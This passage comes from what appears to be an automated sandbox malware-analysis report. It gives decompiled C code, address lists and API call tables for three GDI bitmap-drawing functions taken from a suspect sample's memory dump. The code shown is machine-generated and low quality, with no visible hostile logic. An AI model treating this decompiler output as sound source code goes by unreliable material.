				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00405FC8();
					_v20 = E0041D144(0);
					_push(_t177);
					_push(0x41d568);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00405FC0();
					_v24 = E0041D144(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x44f88c; // 0x46080752
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L004060F0();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L004060F0();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x44f88c; // 0x46080752
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L004060F0();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L004060F0();
						_v40 = _t135;
					}
					_push(_v20);
					L004060C8();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E0041D56F);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L004060F0();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00405FC0();
					_v24 = E0041D144(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x41d3bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00406688(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E0041D56F);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                  0x0041d2e9
                                  0x0041d2eb
                                  0x0041d2f1
                                  0x0041d2f4
                                  0x0041d2f7
                                  0x0041d2f9
                                  0x0041d2fc
                                  0x0041d2ff
                                  0x0041d303
                                  0x0041d30b
                                  0x0041d3c4
                                  0x0041d3c7
                                  0x0041d3c9
                                  0x0041d3d3
                                  0x0041d3d8
                                  0x0041d3d9
                                  0x0041d3de
                                  0x0041d3e1
                                  0x0041d3e4
                                  0x0041d3e5
                                  0x0041d3e9
                                  0x0041d3ea
                                  0x0041d3f4
                                  0x0041d404
                                  0x0041d407
                                  0x0041d409
                                  0x0041d40e
                                  0x0041d40f
                                  0x0041d412
                                  0x0041d413
                                  0x0041d418
                                  0x0041d41b
                                  0x0041d420
                                  0x0041d424
                                  0x0041d425
                                  0x0041d42e
                                  0x0041d444
                                  0x0041d446
                                  0x0041d44b
                                  0x0041d44c
                                  0x0041d44f
                                  0x0041d450
                                  0x0041d455
                                  0x0041d430
                                  0x0041d430
                                  0x0041d435
                                  0x0041d436
                                  0x0041d439
                                  0x0041d43a
                                  0x0041d43f
                                  0x0041d43f
                                  0x0041d45b
                                  0x0041d45c
                                  0x0041d47e
                                  0x0041d4a0
                                  0x0041d4ad
                                  0x0041d4bb
                                  0x0041d4e2
                                  0x0041d507
                                  0x0041d511
                                  0x0041d51b
                                  0x0041d524
                                  0x0041d52e
                                  0x0041d52e
                                  0x0041d537
                                  0x0041d53e
                                  0x0041d541
                                  0x0041d544
                                  0x0041d54d
                                  0x0041d54f
                                  0x0041d554
                                  0x0041d558
                                  0x0041d559
                                  0x0041d559
                                  0x0041d567
                                  0x0041d323
                                  0x0041d323
                                  0x0041d325
                                  0x0041d32a
                                  0x0041d32b
                                  0x0041d335
                                  0x0041d345
                                  0x0041d34a
                                  0x0041d34b
                                  0x0041d350
                                  0x0041d353
                                  0x0041d38f
                                  0x0041d396
                                  0x0041d399
                                  0x0041d39c
                                  0x0041d3ae
                                  0x0041d3ba
                                  0x0041d3ba

                                  APIs
                                  • 72E7A520.GDI32(?,00000001,00000001), ref: 0041D32B
                                  • SelectObject.GDI32(?,?), ref: 0041D340
                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0041D3BB,?,?), ref: 0041D38F
                                  • SelectObject.GDI32(?,?), ref: 0041D3A9
                                  • DeleteObject.GDI32(?), ref: 0041D3B5
                                  • 72E7A590.GDI32(00000000), ref: 0041D3C9
                                  • 72E7A520.GDI32(?,?,?,00000000,0041D568,?,00000000), ref: 0041D3EA
                                  • SelectObject.GDI32(?,?), ref: 0041D3FF
                                  • 72E7B410.GDI32(?,46080752,00000000,?,?,?,?,?,00000000,0041D568,?,00000000), ref: 0041D413
                                  • 72E7B410.GDI32(?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000,0041D568,?,00000000), ref: 0041D425
                                  • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000,0041D568), ref: 0041D43A
                                  • 72E7B410.GDI32(?,46080752,000000FF,?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000,0041D568), ref: 0041D450
                                  • 72E7B150.GDI32(?,?,46080752,000000FF,?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000), ref: 0041D45C
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041D47E
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0041D4A0
                                  • SetTextColor.GDI32(?,00000000), ref: 0041D4A8
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041D4B6
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041D4E2
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041D507
                                  • SetTextColor.GDI32(?,?), ref: 0041D511
                                  • SetBkColor.GDI32(?,?), ref: 0041D51B
                                  • SelectObject.GDI32(?,00000000), ref: 0041D52E
                                  • DeleteObject.GDI32(?), ref: 0041D537
                                  • 72E7B410.GDI32(?,00000000,00000000,0041D56F,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0041D559
                                  • DeleteDC.GDI32(?), ref: 0041D562
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                  • String ID:
                                  • API String ID: 3348367721-0
                                  • Opcode ID: 1ab7ae72cc2fa5ffd4a8ca6bf5e3ddcea2db1065d303b909324aa4fd19bb13f0
                                  • Instruction ID: 995329ef9f57ada67fb6401559fced5fd10f28d71476005ccbb8dbea30ac6681
                                  • Opcode Fuzzy Hash: 1ab7ae72cc2fa5ffd4a8ca6bf5e3ddcea2db1065d303b909324aa4fd19bb13f0
                                  • Instruction Fuzzy Hash: 6A81A3B1A40209AFDB50EFA9CD81FAF77ECAB0D714F114429F618E7281C639AD508B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041F244, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 51%
                                  			E0041F244(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E0041E738(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x41f43f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L004062C0();
					_v12 = E0041D144(0);
					_push(_v12);
					L00405FC8();
					_v20 = E0041D144(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00405FB0();
					_v8 = _t64;
					if(_v8 == 0) {
						L18:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x41f446);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L004064F8();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00405FC8();
							_v16 = E0041D144(_v12);
							_push(_t127);
							_push(0x41f3f7);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E0041EB7C(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L004060F0();
								_push(_v16);
								L004060C8();
								_push(0);
								_push(_t123);
								_push(_v20);
								L004060F0();
								_push(_v20);
								L004060C8();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00405FA8();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x41f3fe);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}



























                                  0x0041f245
                                  0x0041f247
                                  0x0041f24d
                                  0x0041f24f
                                  0x0041f251
                                  0x0041f255
                                  0x0041f25a
                                  0x0041f44f
                                  0x0041f274
                                  0x0041f276
                                  0x0041f27d
                                  0x0041f282
                                  0x0041f287
                                  0x0041f288
                                  0x0041f28d
                                  0x0041f290
                                  0x0041f293
                                  0x0041f295
                                  0x0041f29f
                                  0x0041f2a5
                                  0x0041f2a6
                                  0x0041f2b0
                                  0x0041f2b3
                                  0x0041f2b5
                                  0x0041f2b7
                                  0x0041f2bc
                                  0x0041f2bd
                                  0x0041f2c0
                                  0x0041f2c1
                                  0x0041f2c6
                                  0x0041f2cd
                                  0x0041f411
                                  0x0041f411
                                  0x0041f413
                                  0x0041f416
                                  0x0041f419
                                  0x0041f422
                                  0x0041f428
                                  0x0041f428
                                  0x0041f431
                                  0x0041f433
                                  0x0041f436
                                  0x0041f437
                                  0x0041f439
                                  0x00000000
                                  0x0041f439
                                  0x0041f43e
                                  0x0041f2d3
                                  0x0041f2e0
                                  0x0041f2e9
                                  0x0041f30a
                                  0x0041f30b
                                  0x0041f315
                                  0x0041f31a
                                  0x0041f31b
                                  0x0041f320
                                  0x0041f323
                                  0x0041f32a
                                  0x0041f34a
                                  0x0041f32c
                                  0x0041f32c
                                  0x0041f332
                                  0x0041f346
                                  0x0041f346
                                  0x0041f358
                                  0x0041f35d
                                  0x0041f35f
                                  0x0041f361
                                  0x0041f365
                                  0x0041f366
                                  0x0041f36e
                                  0x0041f36f
                                  0x0041f374
                                  0x0041f376
                                  0x0041f37a
                                  0x0041f37b
                                  0x0041f383
                                  0x0041f384
                                  0x0041f384
                                  0x0041f38e
                                  0x0041f395
                                  0x0041f39a
                                  0x0041f39c
                                  0x0041f3a1
                                  0x0041f3a5
                                  0x0041f3a9
                                  0x0041f3aa
                                  0x0041f3ac
                                  0x0041f3b1
                                  0x0041f3b2
                                  0x0041f3bc
                                  0x0041f3c5
                                  0x0041f3cf
                                  0x0041f3cf
                                  0x0041f3d8
                                  0x0041f3db
                                  0x0041f3db
                                  0x0041f3e2
                                  0x0041f3e5
                                  0x0041f3e8
                                  0x0041f3f6
                                  0x0041f2eb
                                  0x0041f2fd
                                  0x0041f402
                                  0x0041f40c
                                  0x0041f40c
                                  0x00000000
                                  0x0041f402
                                  0x0041f2e9
                                  0x0041f2cd

                                  APIs
                                  • GetObjectA.GDI32(?,00000054,?), ref: 0041F267
                                  • 72E7AC50.USER32(00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F295
                                  • 72E7A590.GDI32(?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F2A6
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F2C1
                                  • SelectObject.GDI32(?,00000000), ref: 0041F2DB
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0041F2FD
                                  • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F30B
                                  • SelectObject.GDI32(?), ref: 0041F353
                                  • 72E7B410.GDI32(?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0041F366
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000,?,?,00000001,00000001), ref: 0041F36F
                                  • 72E7B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000,?), ref: 0041F37B
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000), ref: 0041F384
                                  • SetBkColor.GDI32(?), ref: 0041F38E
                                  • 72E897E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,0041F3F7), ref: 0041F3B2
                                  • SetBkColor.GDI32(?,00000000), ref: 0041F3BC
                                  • SelectObject.GDI32(?,00000000), ref: 0041F3CF
                                  • DeleteObject.GDI32 ref: 0041F3DB
                                  • DeleteDC.GDI32(?), ref: 0041F3F1
                                  • SelectObject.GDI32(?,00000000), ref: 0041F40C
                                  • DeleteDC.GDI32(00000000), ref: 0041F428
                                  • 72E7B380.USER32(00000000,00000000,0041F446,00000001,00000000,?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F439
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                  • String ID:
                                  • API String ID: 4241548881-0
                                  • Opcode ID: d2d6c256d80fc59db48479805b46c774cf83da162ac8937ced3fd103c9342cbc
                                  • Instruction ID: 28178121fae720afaf87065ad6149d50a4ca9fcd309c938633338324e821de39
                                  • Opcode Fuzzy Hash: d2d6c256d80fc59db48479805b46c774cf83da162ac8937ced3fd103c9342cbc
                                  • Instruction Fuzzy Hash: 83514D71E40218ABDB10EBE9CC46FEFB7BCAB08704F11447AB615F72C1D67899458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041FF60, Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0041FF60(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E004026BC(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42047d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x420450);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004030A8(1);
						if(_a4 == 0) {
							E00402AF4( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						 *((intOrPtr*)( *_v60 + 0x10))();
						E00415400(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x14))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t251 = _v64;
					E00402AF4(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E0041D030();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E00415390(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E0041D2B4( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E00415390(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E0041D2D4( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E0041D57C(_v32);
				}
				_push(0);
				L004062C0();
				_v16 = E0041D144(_t160);
				_push(_t323);
				_push(0x4203cb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x44d444 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00405FD0();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040C3F4(_t245, _t257, _t317, _t321);
							} else {
								E0041D030();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00415390(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x42039a;
						 *[fs:eax] = _t290;
						_push(E004203D2);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L004064F8();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E004026BC(_t321);
					_push(_t323);
					_push(0x420333);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E00415390(_v12, _t321, _v24);
					_push(_v16);
					L00405FC8();
					_v20 = E0041D144(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00405FC0();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E0041D834(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L004060F0();
						_v56 = _t204;
						_push(_v20);
						L004060C8();
					}
					_push(_t323);
					_push(0x420307);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00405FD8();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040C3F4(_t245, _t263, _t317, _t321);
						} else {
							E0041D030();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(E0042030E);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L004060F0();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}




















































                                  0x0041ff60
                                  0x0041ff61
                                  0x0041ff63
                                  0x0041ff6c
                                  0x0041ff6e
                                  0x0041ff71
                                  0x0041ff76
                                  0x0041ff7b
                                  0x0041ff80
                                  0x0041ff90
                                  0x0041ff97
                                  0x0041ff9f
                                  0x0041ffa1
                                  0x0041ffa1
                                  0x0041ffb8
                                  0x0041ffbe
                                  0x0041ffc3
                                  0x0041ffc4
                                  0x0041ffc9
                                  0x0041ffcc
                                  0x0041ffd1
                                  0x0041ffd2
                                  0x0041ffd7
                                  0x0041ffda
                                  0x0041ffe1
                                  0x00420040
                                  0x00420043
                                  0x00420049
                                  0x0042004f
                                  0x00420069
                                  0x00420070
                                  0x0042007f
                                  0x00420084
                                  0x00420092
                                  0x0042009e
                                  0x0042009e
                                  0x004200ae
                                  0x004200be
                                  0x004200d2
                                  0x004200e1
                                  0x004200f3
                                  0x004200f9
                                  0x004200f9
                                  0x0041ffe3
                                  0x0041fff3
                                  0x0041fff6
                                  0x00420002
                                  0x00420007
                                  0x0042000d
                                  0x00420014
                                  0x0042001b
                                  0x00420023
                                  0x00420027
                                  0x00420027
                                  0x004200fc
                                  0x00420102
                                  0x0042010a
                                  0x00420112
                                  0x00420114
                                  0x00420114
                                  0x0042011d
                                  0x0042011f
                                  0x00420127
                                  0x00420133
                                  0x00420140
                                  0x00420145
                                  0x00420149
                                  0x00420149
                                  0x00420133
                                  0x00420127
                                  0x00420150
                                  0x0042015b
                                  0x0042015b
                                  0x00420161
                                  0x0042016d
                                  0x00420176
                                  0x00420188
                                  0x0042018e
                                  0x00420190
                                  0x0042019c
                                  0x004201a6
                                  0x004201ab
                                  0x004201ae
                                  0x004201ae
                                  0x004201b1
                                  0x004201b6
                                  0x004201b8
                                  0x004201b8
                                  0x004201be
                                  0x004201c3
                                  0x004201c3
                                  0x004201c8
                                  0x004201ca
                                  0x004201d4
                                  0x004201d9
                                  0x004201da
                                  0x004201df
                                  0x004201e2
                                  0x004201e8
                                  0x004201ed
                                  0x004201fb
                                  0x0042033a
                                  0x0042033c
                                  0x00420341
                                  0x00420342
                                  0x00420347
                                  0x00420348
                                  0x0042034b
                                  0x0042034c
                                  0x00420351
                                  0x00420358
                                  0x00420367
                                  0x00420370
                                  0x00420369
                                  0x00420369
                                  0x00420369
                                  0x00420367
                                  0x00420377
                                  0x0042037d
                                  0x00420380
                                  0x0042038b
                                  0x00420392
                                  0x00420395
                                  0x004203b4
                                  0x004203b7
                                  0x004203ba
                                  0x004203bf
                                  0x004203c2
                                  0x004203c3
                                  0x004203c5
                                  0x004203ca
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00420201
                                  0x00420201
                                  0x00420203
                                  0x0042020d
                                  0x00420212
                                  0x00420213
                                  0x00420218
                                  0x0042021b
                                  0x00420221
                                  0x00420226
                                  0x0042022e
                                  0x0042022f
                                  0x00420239
                                  0x0042023c
                                  0x0042023e
                                  0x00420240
                                  0x00420243
                                  0x00420244
                                  0x00420253
                                  0x00420258
                                  0x0042025e
                                  0x00420263
                                  0x00420265
                                  0x00420271
                                  0x00420274
                                  0x00420279
                                  0x0042027a
                                  0x0042027d
                                  0x0042027e
                                  0x00420283
                                  0x00420289
                                  0x0042028a
                                  0x0042028a
                                  0x00420291
                                  0x00420292
                                  0x00420297
                                  0x0042029a
                                  0x0042029d
                                  0x0042029f
                                  0x004202a2
                                  0x004202a6
                                  0x004202a7
                                  0x004202a9
                                  0x004202aa
                                  0x004202ad
                                  0x004202ae
                                  0x004202b3
                                  0x004202ba
                                  0x004202c3
                                  0x004202cc
                                  0x004202c5
                                  0x004202c5
                                  0x004202c5
                                  0x004202c3
                                  0x004202d3
                                  0x004202d6
                                  0x004202d9
                                  0x004202e2
                                  0x004202e4
                                  0x004202e9
                                  0x004202ed
                                  0x004202ee
                                  0x004202ee
                                  0x00420306
                                  0x00420306

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,00000000,0042047D,?,?), ref: 004201CA
                                  • 72E7A590.GDI32(00000001,00000000,00420333,?,00000000,004203CB,?,00000000,?,00000000,0042047D,?,?), ref: 0042022F
                                  • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00420333,?,00000000,004203CB,?,00000000,?,00000000,0042047D,?,?), ref: 00420244
                                  • SelectObject.GDI32(?,00000000), ref: 0042024E
                                  • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00420333,?,00000000,004203CB,?,00000000), ref: 0042027E
                                  • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00420333,?,00000000,004203CB), ref: 0042028A
                                  • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00420307,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004202AE
                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00420307,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004202BC
                                  • 72E7B410.GDI32(?,00000000,000000FF,0042030E,00000000,?,00000000,00000000,00420307,?,?,00000000,00000001,00000001,00000001,00000001), ref: 004202EE
                                  • SelectObject.GDI32(?,?), ref: 004202FB
                                  • DeleteObject.GDI32(00000000), ref: 00420301
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                  • String ID: ($BM
                                  • API String ID: 3415089252-2980357723
